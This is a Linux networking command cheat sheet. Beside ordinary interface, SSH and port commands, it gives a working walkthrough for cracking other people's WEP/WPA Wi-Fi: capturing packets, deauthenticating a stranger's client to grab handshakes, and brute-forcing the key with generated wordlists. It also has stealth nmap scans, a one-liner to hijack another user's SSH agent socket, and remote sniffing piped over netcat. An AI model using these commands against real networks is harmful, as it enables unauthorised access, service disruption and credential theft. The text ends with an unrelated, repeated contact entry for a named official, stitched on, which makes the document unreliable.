&& The Linux Network Book -------------------------: A booklet about networking using the linux operating system. == tools .. mtr - a traceroute ping program .. traceroute - .. ping - .. ifconfig - .. WIRELESS NETWORKING * show all network 'interfaces' including wireless ones >> ifconfig -a * show all wireless network interfaces (devices) on the computer >> iwconfig * Monitoring wifi connection by watch command (refresh every 3s), >> watch -d -n 3 "iw dev wlan0 station dump; iwconfig wlan0" * scan for available wireless networks using the 'ra0' (ralink) device >> iwlist ra0 scan * list lots of info about available wireless nets from the 'eth1' device >> iwlist eth1 scan | less * list the transmit power information for the 'eth1' wireless interface >> iwlist eth1 txpower CONNECTING TO A WIRELESS NETWORK * connect to a wep access point >> iwconfig [interface] mode managed key [WEP key] >> iwconfig [Interface] essid "[ESSID]" (Specify ESSID for the WLAN) (128 bit WEP use 26 hex characters, 64 bit WEP uses 10) * request IP address, netmask, DNS server and default gateway from the Access Point >> dhclient [interface] * test if the connection worked >> ping www.bbc.co.uk (if you receive a reply you have access) WIRELESS NETWORK SECURITY AUDITING .... The process of attempting to obtain the password for a wireless network may be referred to as a 'security audit' of the network, or more commonly as 'hacking' or 'wardriving'. http://ubuntuforums.org/showthread.php?t=528276 a step by step guide * find the BSSID (mac address) and channel number of the target >> iwlist ra0 scan * find the ESSID and channel number >> iwlist ra0 scan | grep 'Address\|IE\|SSID\|Frequency' * use kismet to scan for available 802.11 wireless networks >> sudo kismet Kismet may be a little tricky to configure. What is more, kismet relies apon 'wireshark' (formerly known as 'ethereal') which itself has been known to have security problems. * start collecting packets from the target access point >> sudo airodump-ng -c 1 --bssid 00:24:01:57:2C:43 -w output ra0 == options explained .. -c 1 - is the channel of the target access point .. --bssid - is the mac address or bssid of the target access point .. ra0 - is your wireless interface (eg wlan0) .. output - a filename prefix for the saving captured packets .. Using 'injection' can speed up the process of collecting packets and therefore being able to unencrypt the wifi password. However in many cases it may be possible to unencrypt the password without using injection. * start attempting to decrypt the password using captured packets >> aircrack-ng -b 00:24:01:57:2C:43 output*.cap == options .. -b 00:24:etc:43 - the mac address (or bssid) of the target access pnt .. output*.cap - the set of files where capture packets are stored .. == othertools .. pycracker .. wesside - .. WPA WIRELESS AUDITING http://www.aircrack-ng.org/doku.php?id=cracking_wpa a guide to wpa wifi auditing http://en.wikipedia.org/wiki/Wi-Fi_Protected_Access the wikipedia page on wpa * show wireless interfaces and devices and chipset >> sudo airmon-ng * disable the 'ath0' wireless interface (device) >> airmon-ng stop ath0 try the following sudo airmon-ng start wlan0 this will start an interface called mon0 etc sudo airodump-ng -w data mon0 collect packets and hopefully handshakes and data from all access points, networks etc Once youve got a handshake (see message below) do sudo aircrack-ng -w dict.txt data*.cap where the dict.txt is a set of words, one of which is hopefully the password for the access point. The basic technique for wpa wireless auditing is ... - capture the 'handshake' between a station which connects to the wireless access point. This involves either deauthenticating a client or else just waiting until you see >> [ WPA handshake: 00:14:6C:7E:40:80 in the top right corner of the airodump screen. In other words, you just have to wait for someone to log onto their wifi wpa access point. - Try to crack the psk with a dictionary file and brute force. This may take a while and depends on how good you dict file is. * find the access point youre going to have a go at with wifi device 'ra0' >> sudo iwlist ra0 scan | less * put the interface into monitor mode >> sudo airmon-ng start wlan0 A new monitor interface such as 'mon0' will be created. Use this with aircrack-ng to try to grab a handshake. * try to get the authentication handshake. Write data to files 'try...' >> airodump-ng -c 9 --bssid D8:5D:4C:AD:29:E9 -w try ra0 or >> airodump-ng -c 9 --bssid D8:5D:4C:AD:29:E9 -w try mon0 Substitute in the bssid and channel (-c) you got from iwlist * try to 'deauthenticate' a client (-c) for access point (-a) >> aireplay-ng -0 1 -a D8:5D:4C:AD:29:E9 -c 00:0F:B5:FD:FB:C2 ath0 This basically tries to close someone's wifi connection so that they will log on again, and when they do, you can capture their authentication packets. == options explained .. -0 - means deauthentication .. 1 - the number of deauths to send (you can send multiple if you wish) .. -a 00:14:6C:7E:40:80 is the MAC address of the access point .. -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing .. ath0 - is the interface name .. CANT START AIRODUMP Here is another suggestion when airodump returns the following error "ioctl(SIOCSIFFLAGS) failed: Name not unique on network" This worked!! First, take the wireless interface down: >> sudo ifconfig wlan0 down Then, change your wireless card to monitor mode: >> sudo iwconfig wlan0 mode monitor Next, bring your wireless interface up: >> sudo ifconfig wlan0 up Then, you can run airodump-ng: >> sudo airodump-ng wlan0 RECOVER WPA PASSWORD .... Once the handshake has been obtained, the task is now 'offline'. No wireless connection is necessary to proceed. * use a word-list file to try to recover the wpa password >> aircrack-ng -w password.lst -b D8:5D:4C:AD:29:E9 try*.cap * or have a go with any network >> sudo aircrack-ng -w dict.txt data*.cap and a list of possible networks will be presented. Problems: --------- aircrack-ng says "got no data packets from target network" "No valid wpa handshakes found..." go back to previous step and wait until you see If aircrack-ng produces the message 'No valid WPA handshakes found.. then you need to go back a step to capture the authentication handshake at described above. * use 'john' password auditor to feed passwords to aircrack * delete the capture files if no hanshakes have been found >> (aircrack-ng -w /usr/share/john/password.lst -b 00:24:17:D1:81:C6 ash*.cap | grep 'No valid WPA hanshakes found') && rm -f ash* WORDLISTS WITH WPA... Each character in the pass-phrase must have an encoding in the range of 32 to 126 (decimal), To audit or recover a wireless wpa password you need to use a 'dictionary' or wordlist file with the aircrack-ng program. Aircrack-ng tests each password found in the wordlist file against the 'handshake' data captured from a wpa wireless authentication. You may need to create or adapt a wordlist to your particular needs in order to speed up the checking process. * obtain a large wordlist with words in several languages >> http://ftp.sunet.se/pub/security/tools/net/Openwall/wordlists/all.gz * remove wpa passwords that are too long or too short from 'dict.lst' >> sed -n '/^.\{8,63\}$/p' dict.lst > new.lst wpa passwords must be between 8 and 63 characters * try cracking the key with a 600K word linux wordlist >> aircrack-ng -w /usr/share/dict/british-english-insane -b D8:5D:4C:AD:29:E9 try*.cap * delete all characters which are not letters, digits or the newline >> cat dict.txt | tr -cd '[:alnum:]\n' > newdict.txt * try to create a wordlist ffrom the content of a webpage (incomplete...) >> lynx -dump http://bumble.sf.net/ | tr -cd '[:alpha:] \n' | tr -s " " | tr ' ' '\n' | less * pipe a bash generated password list to aircrack-ng >> echo ruby{1000..2000} | tr ' ' '\n' | aircrack-ng -w- -b D8:5D:4C:AD:29:E9 try*.cap * remove all punctuation/spaces from 's.lst', uppercase, pipe to aircrack >> tr -dc '[:alnum:]\n' < s.lst | sed 's/.*/\U&/' | aircrack-ng -w- -b D8:5D:4C:AD:29:E9 try*.cap * permute (inflate) dict file 'p.lst', with uppercase and suffixes 0,1,2 >> sed 's/.*/&\n\U&\n&0\&1\&2/' p.lst * reduplicate short lines and add 0,1,2 to all, and uppercase >> sed '/^.\{4,6\}$/s//&&/;s/.*/&\n&0\n&1\n&2\n\U&/' < dict.txt * get rid of punctuation, reduplicate short lines, add numbers, uppercase >> tr -dc '[:alnum:]\n'> john --stdout --wordlist=specialrules.lst --rules | aircrack-ng -e test -a 2 -w - /root/capture/wpa.cap * ensure all passwords are between 8 and 63 characters >> grep -E '^.{8,63}$' < inputfile * use the small password file in the sources of aircrack >> .. /aircrack-ng-1.2-beta2/test/password.lst WORDNET wordnet is a big database of english synonyms and other parts of speech. It may be a useful tool for creating wordlists which can be used to guess ('brute force') WPA wifi passwords. By combining adjectives with nouns, an interesting password list might be created. * create a large list of english adjectives for aircrack ------- echo "wn "{a..z}" -grepa;" | sort | uniq > adj.lst aircrack-ng -w adj.lst --bssid aa:bb:etc data*.cap ,,, * try create a very large list of english nouns ------- echo "wn "{a..z}{a..z}" -grepn;" | bash | sort | uniq > noun.lst aircrack-ng -w noun.lst --bssid aa:bb:etc data*.cap ,,, The code above uses the bash 'expansion' feature to create a long series of 'wn nn -grepn' commands. On my system this creates a wordlist of 118204 nouns and requires about 30 seconds to execute IP ADDRESSES An ip address is a unique number which identifies each computer (or really interface to a computer) on a network * get info about remote host ports and os detection >> nmap -sS -P0 -sV -O * list all ip addresses for this computer >> ifconfig | awk '/inet / {print $2}' * get your internal ip address and nothing but your internal ip >> ifconfig $devices | grep "inet addr" | sed 's/.*inet addr:\([0-9\.]*\).*/\1/g' * send the internal IP address by email >> ifconfig en1 | awk '/inet / {print $2}' | mail -s "hello world" email@email.com BANDWIDTH Bandwidth is the amount of data transfered per second (or other time unit). * Monitor bandwidth by pid >> nethogs -p eth0 * Quick key/value display within /proc or /sys >> grep -r . /sys/class/net/eth0/statistics * Delete all aliases for a network interface on a (Free)BSD system >> ifconfig | grep "0xffffffff" | awk '{ print $2 }' | xargs -n 1 ifconfig em0 delete * Using netcat to copy files between servers >> On target: "nc -l 4000 | tar xvf -" On source: "tar -cf - . | nc target_ip 4000" ROUTERS * Backup your OpenWRT config (only the config) >> curl -d 'username=root&password=your-good-password' "http://router/cgi-bin/luci/admin/system/backup?backup=kthxbye" > `date +%Y%d%m`_config_backup.tgz WIRED ETHERNET * Check if network cable is plugged in and working correctly >> mii-tool eth0 SSH Ssh is a more secure replace for telnet. * a function for hostname tab-completion with ssh --------------------------------- autoCompleteHostname() { local hosts; local cur; hosts=($(awk '{print $1}' ~/.ssh/known_hosts | cut -d, -f1)); cur=${COMP_WORDS[COMP_CWORD]}; COMPREPLY=($(compgen -W '${hosts[@]}' -- $cur )) } complete -F autoCompleteHostname ssh ,,, * ssh autocomplete >> complete -W "$(echo $(grep '^ssh ' .bash_history | sort -u | sed 's/^ssh //'))" ssh SSHFS .... * mount an ssh (remote) file system >> sshfs name@server:/path/to/folder /path/to/mount/point * unmount an ssh file system >> fusermount -u ~/sshfs_mounted_directory TCP PORTS A port is a concept within the tcp transfer control protocol which allows a machine to make multiple 'socket' connections through a single network interface. * list open tcp/ip ports on the local computer and program name >> netstat -tl >> netstat -tupl * list open tcp/ip ports on the local computer and port number >> netstat -tlnp * show some port info >> lsof -i * find listening ports by pid >> lsof -nP +p 24073 | grep -i listen | awk '{print $1,$2,$7,$8,$9}' NETCAT Netcat or just 'nc' is considered to be highly useful network tool for copying data to and from network connections. I dont get it really. * tar a directory and send it to netcat >> tar cfvz - /home/user | netcat -l -p 10000 PINGING Ping can be used to tell if a particular host is 'alive' on the network. * use ping >> ping 192.168.1.1. * Ping a URL sending output to file and STDOUT >> ping google.com | tee ping-output.txt * perform a ping sweep of all computers in an ip range >> nmap -sP 192.168.1.* * use a 'tcp' ping (tcp ACK packet) to see if a host is responding >> nmap -PT 192.168.1.1 * use a tcp ping on port 6000 to see if a host is responding >> nmap -PT6000 192.168.1.1 Configure a 'stateful' firewall to stop these attacks. SCANNING TCP PORTS It is possible to query all the available tcp ports on the local or a remote computer in order to find out which ports are 'listening' (waiting for a connection) * use tcp-connect to scan common ports on a host for tcp services >> nmap -sT 10.0.0.1 This is not a 'stealthy' technique since the host will probably log these attempts. * use nmap to scan all possible ports on a host for tcp services >> nmap -sT 10.0.0.1 -p 1-65535 * use a 'SYN' scan to scan common ports on a host for tcp services >> nmap -sS 10.0.0.1 * use a 'SYN' scan to scan for open tcp ports on the local computer >> sudo nmap -sS 127.0.0.1 * perform a 'FIN' scan of the tcp ports of a host >> nmap -sF 192.168.1.100 FIN is normally used to end or destroy a tcp/ip connection * perform a scan of the tcp ports of a host by sending a "NULL" packet >> nmap -sN 192.168.1.100 IP PROTOCOL * see what ip protocols are supported on which ports >> sudo nmap -sO 192.168.1.1 * see what ip protocols are running on the local computer >> sudo nmap -sO 127.0.0.1 TCP SERVICES * use amap to find out what type of service a port is running >> amap * show port numbers for common tcp/ip services >> less /etc/services WEB SERVERS This section is not an in depth treatment of the large topic of web servers but only some cursory notes relating to security and trouble shooting. A web server is a potential security hazard, as are all listening tcp services. * check whether the apache webserver is currently running >> sudo service apache2 status * restart the apache server >> sudo apache2ctl restart * stop apache from automatically starting at boot time (ubuntu) >> sudo chkconfig apache2 off * show all loaded apache modules >> apache2ctl -M For the sake of security its a good idea to check your log files to see how people are trying to break into your computer via the webserver * view the latest apache access log >> less /var/log/apache2/access.log * check all the apache log files, but not necessarily in the right order >> zcat /var/log/apache2/access.log.* | less * check all apache log files except your own activities >> zcat /var/log/apache2/access.log.* | grep -v '127.0.0.1' | less * what who is using tcp port 80 >> watch lsof -i :80 >> lsof -i :80 TELNET * scans for open ports using telnet >> HOST=127.0.0.1;for((port=1;port<=65535;++port)); do echo -en "$port ";if echo -en "open $HOST $port\nlogout\quit" | telnet 2>/dev/null | grep 'Connected to' > /dev/null; then echo -en "\n\nport $port/tcp is open\n\n";fi;done | grep open MISCELANEOUS * How to establish a remote Gnu screen session >> ssh -t user@some.domain.com /usr/bin/screen -xRR * Check a server is up. If it isn't mail me. >> ping -q -c1 -w3 brandx.jp.sme 2&>1 /dev/null || echo brandx.jp.sme ping failed | mail -ne -s'Server unavailable' joker@jp.co.uk * Copy specific files to another machine, keeping the file >> tar cpfP - $(find -type f -name *.png) | ssh user@host | tar xpfP - * Graph # of connections for each hosts. >> netstat -an | grep ESTABLISHED | awk '{print $5}' | awk -F: '{print $1}' | sort | uniq -c | awk '{ printf("%s\t%s\t",$2,$1) ; for (i = 0; i < $1; i++) {printf("*")}; print "" }' * How to run a command on a list of remote servers read from a file >> while read server; do ssh -n user@$server "command"; done < servers.txt * find all active IP addresses in a network >> nmap -sP 192.168.0.* * connect via ssh using mac address >> ssh root@`for ((i=100; i<=110; i++));do arp -a 192.168.1.$i; done | grep 00:35:cf:56:b2:2g | awk '{print $2}' | sed -e 's/(//' -e 's/)//'` * autossh + ssh + screen = super rad perma-sessions >> AUTOSSH_POLL=1 autossh -M 21010 hostname -t 'screen -Dr' * determine if tcp port is open >> nc -zw2 www.example.com 80 && echo open * Block an IP address from connecting to a server >> iptables -A INPUT -s 222.35.138.25/32 -j DROP * Create an SSH SOCKS proxy server on localhost:8000 that will >> autossh -f -M 20000 -D 8000 somehost -N * Measures download speed on eth0 >> while true; do X=$Y; sleep 1; Y=$(ifconfig eth0|grep RX\ bytes|awk '{ print $2 }'|cut -d : -f 2); echo "$(( Y-X )) bps"; done * Show which programs are listening on TCP and UDP ports >> netstat -plunt * Resume an aborted scp file transfers >> rsync --partial --progress --rsh=ssh SOURCE DESTINATION * get all the data about your IP configuration across all network >> ipconfig /all * Get your public ip address >> python -c "import socket; s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect(('google.com', 80)); print s.getsockname()[0]" * Informations sur les connexions reseau >> netstat -taupe * Get all IPs via ifconfig >> ifconfig | grep "inet [[:alpha:]]\+" | cut -d: -f2 | cut -d' ' -f2 * See a list of ports running >> netstat -an | grep -i listen * Periodically loop a command >> while true; do ifconfig eth0 | grep "inet addr:"; sleep 60; done; * Graphical display of wireless links >> wmwave * See smbstatus all the time >> while (( $i != 0 )) { smbstatus; sleep 5; clear } * Number of open connections per ip. >> netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n * Snmpwalk a hosts's entire OID tree with SNMP V3 >> snmpwalk -v3 -On -u -l NoAuthNoPriv -m ALL . * Snmpwalk a hosts's entire OID tree with SNMP V3 with SHA >> snmpwalk -v3 -On -u -l AuthNoPriv -a SHA -A -m ALL . * Creates a proxy based on tsocks. >> alias tproxy='ssh -ND 8118 user@server&; export LD_PRELOAD="/usr/lib/libtsocks.so"' * Ping a range of addresses >> nmap -sP -T Insane 192.168.1.1-254 * Connect to remote machine with other encoding charset >> LC_ALL=fr_FR luit ssh root@remote_machine_ip * NICs, IPs, and Mac >> ifconfig -a | nawk 'BEGIN {FS=" "}{RS="\n"}{ if($1~ /:/) {printf "%s ", $1}}{ if($1=="inet") {print " -- ",system("arp "$2)}}'|egrep -v "^[0-9]$" * Show what 'process id' (pid) is listening on port 80 on Linux >> netstat -alnp | grep ::80 * Simple way to envoke a secure vnc session through ssh enabled >> vncviewer -via root@your.dyndns.com 192.168.1.1 * Transfer SSH public key to another machine in one step >> ssh-keygen; ssh-copy-id user@host; ssh user@host * live ssh network throughput test >> yes | pv | ssh $host "cat > /dev/null" * check open ports >> lsof -Pni4 | grep LISTEN * Display current bandwidth statistics >> ifstat -nt * Remotely sniff traffic and pass to snort >> sniff_host: tcpdump -nn -i eth1 -w - | nc 192.168.0.2 666 * Proxy all web traffic via ssh >> Putty -d 8080 [server] * Multiple SSH Tunnels >> ssh -L :: -L :: @ * Monitor TCP opened connections >> watch -n 1 "netstat -tpanl | grep ESTABLISHED" * Sort dotted quads >> sort -nt . -k 1,1 -k 2,2 -k 3,3 -k 4,4 * count IPv4 connections per IP >> netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | sed s/::ffff:// | cut -d: -f1 | sort | uniq -c | sort -n * analyze traffic remotely over ssh w/ wireshark >> ssh root@server.com 'tshark -f "port !22" -w -' | wireshark -k -i - * bkup the old files >> find -type f -mtime + -exec scp -r {} user@backuphost:/data/bkup \; * Use dig instead of nslookup >> dig google.com * Get your external IP address >> html2text http://checkip.dyndns.org | grep -i 'Current IP Address:'|cut * Connect to irssi over ssh >> rxvt-unicode -g 999x999 -sr -depth 32 -bg rg-ba:0000/0000/0000/dddd +sb -T irssi -n irssi -name irssichat -e ssh server.com -Xt screen -aAdr -RR irssi irssi * Read just the IP address of a device >> /sbin/ifconfig | grep inet | cut -f 2 -d ":" | cut -f 1 -d " " |egrep -v "^$" * Read just the IP address of a device >> /sbin/ifconfig | grep inet | cut -f 2 -d ":" | cut -f 1 -d " " * Adhoc tar backup >> tar -cvzf - /source/path | ssh -l dd of=/destination/path/backupfile.tgz * List open sockets protocol/address/port/state/PID/program name >> sudo netstat -punta * The simplest way to transport information over a network >> (on destination machine) nc -l 1234 > whatever; (on source machine) nc destination 1234 < whatever; * Ride another SSH agent >> export SSH_AUTH_SOCK=`find /tmp/ssh* -type s -user [user] -mtime -1 | head -1` * Validate openssh key & print checksum >> ssh-keygen -l -f [pubkey] | awk '{print $2}' | tr -ds ':' '' | egrep -ie "[a-f0-9]{32}" department of education contact: scott mitchell, tel: 03 6212 3225, mail: scott.mitchell@education.tas.gov.au. a person who knows about teachers aide department of education contact: scott mitchell, tel: 03 6212 3225, mail: scott.mitchell@education.tas.gov.au. a person who knows about teachers aide